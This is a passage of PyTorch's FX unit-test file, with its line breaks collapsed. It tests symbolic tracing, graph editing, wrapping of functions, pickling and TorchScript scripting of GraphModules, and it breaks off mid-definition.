# Owner(s): ["oncall: fx"] import builtins import contextlib import copy import functools import inspect import math import numbers import operator import os import pickle import sys import torch import traceback import typing import types import warnings import unittest from math import sqrt from torch.multiprocessing import Process from torch.testing import FileCheck from torch.testing._internal.common_methods_invocations import op_db from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests import torch.utils._pytree as pytree import torch.fx._pytree as fx_pytree from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH from torch.fx.node import Target, Argument from torch.fx.passes import shape_prop from torch.fx.immutable_collections import immutable_dict, immutable_list from torch.fx.experimental.rewriter import RewritingTracer from torch.fx.operator_schemas import get_signature_for_torch_op from copy import deepcopy from collections import namedtuple from torch.fx.proxy import TraceError from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401 from fx.test_dce_pass import TestDCE # noqa: F401 from fx.test_fx_const_fold import TestConstFold # noqa: F401 from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import AnnotationsTest # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import TypeCheckerTest # noqa: F401 from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union from torch.testing._internal.common_utils import ( IS_FBCODE, IS_MACOS, IS_WINDOWS, TEST_WITH_ROCM, find_library_location, run_tests, ) from torch.testing._internal.jit_utils import JitTestCase from fx.named_tup import MyNamedTup try: from torchvision import models as torchvision_models HAS_TORCHVISION = True except ImportError: HAS_TORCHVISION = False skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision") class SimpleTest(torch.nn.Module): def forward(self, x): return torch.relu(x + 3.0) def a_non_torch_leaf(a, b): return a + b # Used for test_autowrap_function. Autowrapped functions need to be global def fx_int(x: float) -> int: return int(x) def fx_int_x2(x: float) -> int: return int(x) * 2 # used in test_pytree. It's all the way out here because pickling a GraphModule # that uses Point errors out if Point is local to the function Point = namedtuple('Point', ['x', 'y']) # Test wrap() passing both a function name as well as a function # directly def a_lifted_leaf(a, b): return a[0] + a[1] + b wrap('a_lifted_leaf') # Test wrapping twice doesn't break anything wrap('a_lifted_leaf') def a_lifted_leaf2(a, b): return a[0] + a[1] + b wrap(a_lifted_leaf2) wrap('len') wrap('getattr') @wrap def wrapped_via_decorator(a): return a + 1 wrap('wrapped_with_submodule') def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d): return batchnorm1d(x) real_wrapped_via_decorator = wrapped_via_decorator real_a_lifed_leaf = a_lifted_leaf real_a_lifed_leaf2 = a_lifted_leaf2 _sqrt = sqrt wrap('wrapper_fn') def wrapper_fn(x): return torch.foo(x) class Pair(NamedTuple): x : torch.Tensor y : torch.Tensor # for testing pytrees class Foo(object): # noqa: B209 def __init__(self, a, b): self.a = a self.b = b class TestFX(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS): lib_file_path = find_library_location('libtorchbind_test.so') torch.ops.load_library(str(lib_file_path)) def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None): """Check that an nn.Module's results match the GraphModule version for a given set of args/kwargs. """ kwargs = kwargs if kwargs else {} ref_outs = m(*args, **kwargs) gm = symbolic_trace(m) gm.graph.lint() test_outs = gm(*args, **kwargs) self.assertEqual(ref_outs, test_outs) def test_graph_module(self): class MySub(torch.nn.Module): def __init__(self): super().__init__() self.w = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.w + x class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.lin = torch.nn.Linear(4, 3) self.sub_mod = MySub() self.w = torch.nn.Parameter(torch.rand(3)) def forward(self, A, B, c): t = torch.sigmoid(A) + self.lin(c) return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3)) m = MyModule() gm = symbolic_trace(m) ms = torch.jit.script(gm) class M2(torch.nn.Module): def forward(self, A): m, idx = torch.max(A, 0) return m + 1, idx + 1 m2 = M2() gm2 = symbolic_trace(m2) class T(torch.nn.Module): def forward(self, A, b=4, *args, c=5, **kwargs): x = A + 1 + args[0] + kwargs['3'] return x t = T() symbolic_trace(t) # test for issue described at https://github.com/pytorch/pytorch/issues/63883 class M3(torch.nn.Module): def forward(self, x): return torch.relu(x) m3 = M3() gm3 = symbolic_trace(m3) new_instance = gm3.__new__(type(gm3)) new_instance.__init__(gm3, gm3.graph) x = torch.randn(5, 3) torch.testing.assert_allclose(new_instance(x), torch.relu(x)) def test_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) x, y = torch.rand(1), torch.rand(1) self.assertEqual(torch.sin(x + y), gm(x, y)) def test_args_kwargs(self): class T(torch.nn.Module): def forward(self, *args, **kwargs): x = args[0] + kwargs['foo'] return x t = T() self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_args_kwargs_no_self(self): class T(torch.nn.Module): def forward(*args, **kwargs): # noqa: B902 self = args[0] return torch.relu(args[1]) t = T() with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'): self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_fx_shifts(self): class MyModule(torch.nn.Module): def forward(self, x): return x << 3, x >> 3 input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_fx_and_or(self): class MyModule(torch.nn.Module): def forward(self, x): return x & x, x | x input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_dict(self): class MyDictMod(torch.nn.Module): def forward(self, d): return d['3'].relu(), {'4' : d['3'].neg()} input_dict = {'3': torch.rand(3, 4)} m = MyDictMod() self.checkGraphModule(m, (input_dict,)) def test_matmul_tracing(self): const = torch.randn(3) def matmul_f(x): return x @ const mod = symbolic_trace(matmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), matmul_f(inp)) def rmatmul_f(x): return const @ x mod = symbolic_trace(rmatmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), rmatmul_f(inp)) def test_disallow_override(self): # Custom delegate to disallow in-place tensor operations class NoMutableCallTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: name = target if isinstance(target, str) else torch.typename(target) if name[-1] == '_': raise RuntimeError('In-place operations are not supported') return super().create_node(kind, target, args, kwargs, name) # Test method class MyInplaceMod(torch.nn.Module): def forward(self, x): x.add_(3.0) return x m = MyInplaceMod() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m) # Test free function class MyInplaceMod2(torch.nn.Module): def forward(self, x): torch.log_(x) return x m2 = MyInplaceMod2() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m2) # Test symbolic node as an arg class MyInplaceMod3(torch.nn.Module): def forward(self, x): y = torch.ones(3, 4) y.add_(x) return x m3 = MyInplaceMod3() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m3) def test_leaf_module(self): # Custom delegate to make it so that there are no leaf modules, everything # should get traced through class NoLeafModulesTracer(Tracer): def is_leaf_module(self, m, qualname): return False class MyReluMod(torch.nn.Module): def __init__(self): super().__init__() self.relu = torch.nn.ReLU() def forward(self, x): return self.relu(x) mrm = MyReluMod() sym = NoLeafModulesTracer().trace(mrm) for node in sym.nodes: self.assertNotEqual(node.op, 'call_module') sym.lint() def test_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf2', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_wrapped_via_decorator(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(m).transform() self.assertIn('wrapped_via_decorator', transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) m = symbolic_trace(M()) self.assertIn("wrapped_with_submodule", m.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), m(input)) def test_wrapped_retrace(self): def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) retraced = symbolic_trace(m) self.assertIn('wrapped_via_decorator', retraced.code) self.assertEqual(retraced(0), 1) def test_graph_edit_with_proxy(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) gm.graph.lint() self.assertEqual(gm(3, 4), 14) def test_graph_unique_names(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) seen_names : Set[str] = set() for node in gm.graph.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_stack_traces(self): class M(torch.nn.Module): def forward(self, a, b): return a + b tracer = torch.fx.Tracer() tracer.record_stack_traces = True graph = tracer.trace(M()) for node in graph.nodes: if node.op == 'output': continue self.assertTrue(node.stack_trace is not None) assert 'test_fx.py' in node.stack_trace def test_graph_unique_names_manual(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1') c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) graph2 = torch.fx.Graph() val_map : Dict[Node, Node] = {} graph2.graph_copy(graph, val_map) seen_names : Set[str] = set() for node in graph2.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_unpack(self): class M(torch.nn.Module): def forward(self, a, b): c, d = a return c + d + b a = (torch.rand(1), torch.rand(1)) b = torch.rand(1) m = M() self.checkGraphModule(m, (a, b)) def test_native_callable(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: raise unittest.SkipTest("non-portable load_library call used in test") # This test exercises the case where we use FX to translate from Python # code to some native callable object # # For the purposes of testing, we use ElementwiseInterpreter defined # in test_custom_class.cpp. # # We test that we can # 1) Construct a native callable from FX IR # 2) Construct a drop-in replacement module that delegates to the # native callable rather than the original code # 3) Run both the original code and native callable wrapper with # equivalent results # 4) TorchScript compile the native callable wrapper and confirm # equivalent results with the reference # 5) TorchScript serialize and deserialize the native callable # and confirm equivalent results with the reference # We use this simple Module as a reference computation class MySimpleMod(torch.nn.Module): def forward(self, x): return 3.0 * x + x msm = MySimpleMod() # This is what a lowering pass might look like: a function that takes # a valid nn.Module, symbolically traces it, lowers the Module to some # representation, and wraps that representation up into another # nn.Module instance that handles dispatch to the compiled/lowered code. def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module: # ===== Stage 1: Symbolic trace the module ===== mod = symbolic_trace(orig_mod) # ===== Stage 2: Lower GraphModule representation to the C++ # interpreter's instruction format ====== instructions = [] constant_idx = 0 constants = {} fn_input_names = [] target_to_name = { operator.add : "add", operator.mul : "mul" } output_node : Optional[Node] = None # For each instruction, create a triple # (instruction_name : str, inputs : List[str], output : str) # to feed into the C++ interpreter for n in mod.graph.nodes: target, args, out_name = n.target, n.args, n.name assert len(n.kwargs) == 0, "kwargs currently not supported" if n.op == 'placeholder': # Placeholders specify function argument names. Save these # for later when we generate the wrapper GraphModule fn_input_names.append(target) elif n.op == 'call_function': assert target in target_to_name, "Unsupported call target " + target arg_names = [] for arg in args: if not isinstance(arg, Node): # Pull out constants. These constants will later be # fed to the interpreter C++ object via add_constant() arg_name = f'constant_{constant_idx}' constants[arg_name] = torch.tensor( [arg] if isinstance(arg, numbers.Number) else arg) arg_names.append(arg_name) constant_idx += 1 else: arg_names.append(arg.name) instructions.append((target_to_name[target], arg_names, out_name)) elif n.op == 'output': if output_node is not None: raise RuntimeError('Multiple output nodes!') output_node = n else: raise RuntimeError('Unsupported opcode ' + n.op) interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter() # Load constants for k, v in constants.items(): interpreter.add_constant(k, v) # Specify names for positional input arguments interpreter.set_input_names(fn_input_names) # Load instructions interpreter.set_instructions(instructions) # Specify name for single output assert isinstance(output_node.args[0], torch.fx.Node) interpreter.set_output_name(output_node.args[0].name) # ===== Stage 3: Create a wrapper GraphModule around the interpreter ===== class WrapperModule(torch.nn.Module): def __init__(self, interpreter): super().__init__() self.interpreter = interpreter wrapper = WrapperModule(interpreter) # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter # 3) Returns the speficied return value # FIXME: The following code could be greatly simplified by symbolic_trace'ing # the wrapper with a Tracer that considers the Wrapper instance a root # module, however, I can't get `__call__` exposed on TorchBind classes # without it messing up Python `hasattr` for some reason. More digging # into CPython's implementation of hasattr is probably in order... graph = torch.fx.Graph() # Add placeholders for fn inputs placeholder_nodes = [] for name in fn_input_names: placeholder_nodes.append(graph.create_node('placeholder', name)) # Get the interpreter object interpreter_node = graph.create_node('get_attr', 'interpreter') # Add a node to call the interpreter instance output_node = graph.create_node( op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes)) # Register output graph.output(output_node) graph.lint() # Return final GraphModule!!! return GraphModule(wrapper, graph) # Lower GraphModule to C++ interpreter lowered = lower_to_elementwise_interpreter(msm) # Compare correctness with original module x = torch.rand(3, 4) ref_out = msm(x) test_out = lowered(x) torch.testing.assert_close(test_out, ref_out) # Test TorchScript compilation scripted_lowered = torch.jit.script(lowered) script_out = scripted_lowered(x) torch.testing.assert_close(script_out, ref_out) # Test TorchScript ser/de import_copy = self.getExportImportCopy(scripted_lowered) imported_out = import_copy(x) torch.testing.assert_close(imported_out, ref_out) def test_reserved_getattr(self): """Ensure that we do not name any nodes with a reserved builtin like `getattr`""" class M(torch.nn.Module): def forward(self, a): return a.foo.bar.baz m = M() m_g = symbolic_trace(m) m_g.graph.lint() for node in m_g.graph.nodes: self.assertTrue(node.name != "getattr") def test_node_tagging(self): class TaggingTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: n = super().create_node(kind, target, args, kwargs, name) n.tag = 'foo' return n class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = TaggingTracer().trace(m) g.lint() for n in g.nodes: self.assertTrue(hasattr(n, 'tag')) self.assertEqual(n.tag, 'foo') def test_tensor_attribute(self): class TensorAttribute(torch.nn.Module): def __init__(self): super().__init__() self.tensor = torch.rand(3, 4) def forward(self, x): return torch.nn.functional.linear(x, self.tensor) ta = TensorAttribute() traced = symbolic_trace(ta) traced(torch.rand(4, 4)) class WrapperForQualname(torch.nn.Module): def __init__(self): super().__init__() self.ta = TensorAttribute() def forward(self, x): return torch.nn.functional.linear(x, self.ta.tensor) wfq = WrapperForQualname() traced2 = symbolic_trace(wfq) traced2.graph.lint() traced2(torch.rand(4, 4)) def test_tensor_attribute_coalseced(self): def count_attrs(fx_module): targets = set() for node in traced.graph.nodes: if node.op == 'get_attr': targets.add(node.target) return len(targets) val = torch.tensor(5) def f(x): return x + val + val traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 1) val2 = torch.tensor(5) def f(x): val = torch.tensor(5) return x + val + val2 traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 2) def test_symbolic_trace_sequential(self): class Simple(torch.nn.Module): def forward(self, x): return torch.neg(x) seq = torch.nn.Sequential( Simple(), Simple(), Simple() ) traced = symbolic_trace(seq) traced.graph.lint() x = torch.rand(3, 4) self.assertEqual(traced(x), seq(x)) def test_tensor_constant(self): class ConstTensor(torch.nn.Module): def forward(self, x): return torch.nn.functional.linear(x, torch.zeros(3, 4)) ct = ConstTensor() traced = symbolic_trace(ct) traced.graph.lint() traced(torch.rand(4, 4)) def test_pickle_graphmodule(self): class Nested(torch.nn.Module): def __init__(self): super().__init__() self.st = torch.nn.Linear(4, 4) def forward(self, x): return self.st(x) n = Nested() traced = symbolic_trace(n) traced.graph.lint() pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() x = torch.rand(3, 4) self.assertEqual(loaded(x), traced(x)) def test_pickle_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) loaded.graph.lint() x, y = torch.rand(1), torch.rand(1) self.assertEqual(loaded(x, y), gm(x, y)) def test_all_input_nodes(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.placeholder('x') b : torch.fx.Node = graph.call_module('linear_mod', args=(a,)) c : torch.fx.Node = graph.get_attr('y_attr') d : torch.fx.Node = graph.call_function(operator.add, args=(b, c)) e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0)) graph.output(e) graph.lint() self.assertEqual(b.all_input_nodes, [a]) self.assertEqual(c.all_input_nodes, []) self.assertEqual(d.all_input_nodes, [b, c]) self.assertEqual(e.all_input_nodes, [d]) def test_deepcopy_graphmodule_with_transform(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() def transform(traced): new_graph = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_value = new_graph.graph_copy(traced.graph, val_map) relu_out = new_graph.create_node( op='call_method', target='neg', args=(output_value,), kwargs={}) new_graph.output(relu_out) return GraphModule(traced, new_graph) transformed = transform(traced) transformed.graph.lint() copied = copy.deepcopy(transformed) self.assertNotEqual(id(type(transformed)), id(type(copied))) x = torch.randn(3, 4) self.assertEqual(copied(x), transformed(x)) def test_deepcopy_with_submods_params(self): class Bar(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) def forward(self, x): return torch.relu(x) + self.param class Baz(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.bar = Bar() def forward(self, x): return self.bar(x) - self.param baz = Baz() traced = symbolic_trace(baz) traced.graph.lint() copied = copy.deepcopy(traced) copied.graph.lint() def test_deepcopy_graph_with_tracer_cls(self): class TestTracer(Tracer): def is_leaf_module(self, module, name): return True g = Graph(tracer_cls=TestTracer) x = g.placeholder("x") g.output(x) h = copy.deepcopy(g) self.assertIsNotNone(h._tracer_cls) self.assertTrue(g._tracer_cls == h._tracer_cls) def test_unpack_list_better_error(self): class SomeArgs(torch.nn.Module): def forward(self, a, b): return torch.rand(3, 4) class UnpacksList(torch.nn.Module): def __init__(self): super().__init__() self.sa = SomeArgs() def forward(self, x : list): return self.sa(*x) ul = UnpacksList() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ul) def test_unpack_dict_better_error(self): class SomeKwargs(torch.nn.Module): def forward(self, x=3, y=4): return torch.rand(3, 4) class UnpacksDict(torch.nn.Module): def __init__(self): super().__init__() self.sk = SomeKwargs() def forward(self, x : dict): return self.sk(**x) ud = UnpacksDict() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ud) def test_pretty_print_targets(self): # Test that Graph pretty-print prints friendly name for targets # in `operator` and `builtins` class SomeMod(torch.nn.Module): def forward(self, x): return torch.add(x.foo + x.bar, 3.0) traced = symbolic_trace(SomeMod()) graph_str = str(traced.graph) self.assertIn('builtins.getattr', graph_str) self.assertIn('operator.add', graph_str) self.assertIn('torch.add', graph_str) def test_pretty_print_node(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.param: torch.nn.Parameter = torch.nn.Parameter( torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x: torch.Tensor, y: int = 2): return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0) traced = symbolic_trace(M()) all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes]) FileCheck().check("x").check("placeholder") \ .check("y").check("placeholder") \ .check("getitem").check("call_function") \ .check("param").check("get_attr") \ .check("add").check("call_function") \ .check("linear").check("call_module") \ .check("clamp").check("call_method") \ .run(all_formatted) def test_script_tensor_constant(self): # TorchScript seems to ignore attributes that start with `__`. # We used to call anonymous Tensor values `__tensor_constant*`, but # they were getting ignored by script. Now they're called # `_tensor_constant*` class IHaveATensorConstant(torch.nn.Module): def forward(self, x): return x + torch.rand(3, 4) traced = torch.fx.symbolic_trace(IHaveATensorConstant()) torch.jit.script(traced) def test_autowrap_functions(self): class AutowrapFnTest(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) class AutowrapFnTest2(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2) # Check function(s) are wrapped # `int` would normally throw a TypeError as argument can't be `Proxy` tracer = Tracer(autowrap_functions=(fx_int,)) graph = tracer.trace(AutowrapFnTest()) traced = GraphModule(tracer.root, graph, 'test') tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2)) tracer_2.trace(AutowrapFnTest2()) # Test scriptability traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(4)), 2) def test_torch_fx_len(self): class FXLenTest(torch.nn.Module): def forward(self, x): return len(x) traced = symbolic_trace(FXLenTest()) self.assertEqual(traced(torch.rand(3, 4)), 3) # Test scriptability scripted = torch.jit.script(FXLenTest()) self.assertEqual(scripted(torch.rand(3)), 3) traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(3)), 3) # Test non-proxy len class FXLenTest2(torch.nn.Module): def __init__(self): super().__init__() self.l = [3, 4, 5] def forward(self, x): return x + len(self.l) traced2 = symbolic_trace(FXLenTest2()) inp = torch.rand(3, 4) self.assertEqual(traced2(inp), inp + 3.0) self.assertIs(len, builtins.len) def test_torch_fx_getattr(self): class FXGetattrTest(torch.nn.Module): def forward(self, x): return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3])) traced = symbolic_trace(FXGetattrTest()) self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3])) def test_sqrt(self): class Sqrt1(torch.nn.Module): def forward(self, x): return sqrt(x.size(0)) class Sqrt2(torch.nn.Module): def forward(self, x): return math.sqrt(x.size(0)) class Sqrt3(torch.nn.Module): def forward(self, x): return x + math.sqrt(2) + sqrt(2) self.checkGraphModule(Sqrt1(), [torch.zeros(8)]) self.checkGraphModule(Sqrt2(), [torch.zeros(8)]) self.checkGraphModule(Sqrt3(), [torch.zeros(8)]) self.assertIs(sqrt, _sqrt) self.assertIs(math.sqrt, _sqrt) def test_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() out = gm(input) self.assertEqual(out, ref_out) def test_pickle_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) self.assertEqual(loaded(input), gm(input)) def test_pretty_print(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() printed = str(traced) assert 'SimpleTest()' in printed assert 'torch.relu' in printed def test_pretty_print_graph(self): class KwargPrintTest(torch.nn.Module): def forward(self, x): return torch.squeeze(x + 3.0, dim=2) st = KwargPrintTest() traced = symbolic_trace(st) traced.graph.lint() stringed = str(traced.graph) for s in ['args', 'kwargs', '#users']: assert s in stringed def test_custom_proxy_type(self): class TensorPair: def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair(x : TensorPair, y : TensorPair): s = x.add(y) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair(x, y) traced = symbolic_trace(use_tensor_pair) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_type_literal(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_literal(x : TensorPair): s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3))) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair_literal(x) traced = symbolic_trace(use_tensor_pair_literal) traced_out = traced(x) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_dynamic_value(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor): s = x.add(TensorPair(y, y)) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = torch.randn(5, 3) ref_out = use_tensor_pair_ctor(x, y) traced = symbolic_trace(use_tensor_pair_ctor) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_input_dependent_control_flow(self): class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, inp): if inp.sum() == 0: self.is_zero = True self.tensor = torch.tensor([]) else: self.is_zero = False self.tensor = inp def add(self, other): if self.is_zero: return ZeroTensor(other.tensor) elif other.is_zero: return self def use_zero_tensor(x : torch.Tensor, y : torch.Tensor): return ZeroTensor(x + y) x, y = torch.randn(5, 3), torch.randn(5, 3) ref_out = use_zero_tensor(x, y) traced = symbolic_trace(use_zero_tensor) traced_out = traced(x, y) self.assertEqual(traced_out.is_zero, ref_out.is_zero) self.assertEqual(traced_out.tensor, ref_out.tensor) def test_graph_fns(self): g = Graph() a = g.placeholder('a') b = g.call_module('linear', (a,)) c = g.get_attr('bias') d = g.call_method('add', (b, c)) e = g.call_function(torch.sin, (d,)) g.output(e) mod = torch.nn.Module() mod.linear = torch.nn.Linear(3, 4) mod.bias = torch.rand(4) gm = GraphModule(mod, g) gm.graph.lint() input = torch.rand(3) r = gm(input) ref = torch.sin(mod.linear(input) + mod.bias) self.assertEqual(r, ref) def test_remove_uses(self): g : torch.fx.Graph = Graph() x : torch.fx.Node = g.placeholder('x') relu : torch.fx.Node = g.call_function(torch.relu, (x,)) neg : torch.fx.Node = g.call_function(torch.neg, (relu,)) g.output(neg) neg.replace_all_uses_with(relu) g.erase_node(neg) self.assertTrue(neg not in relu.users) def 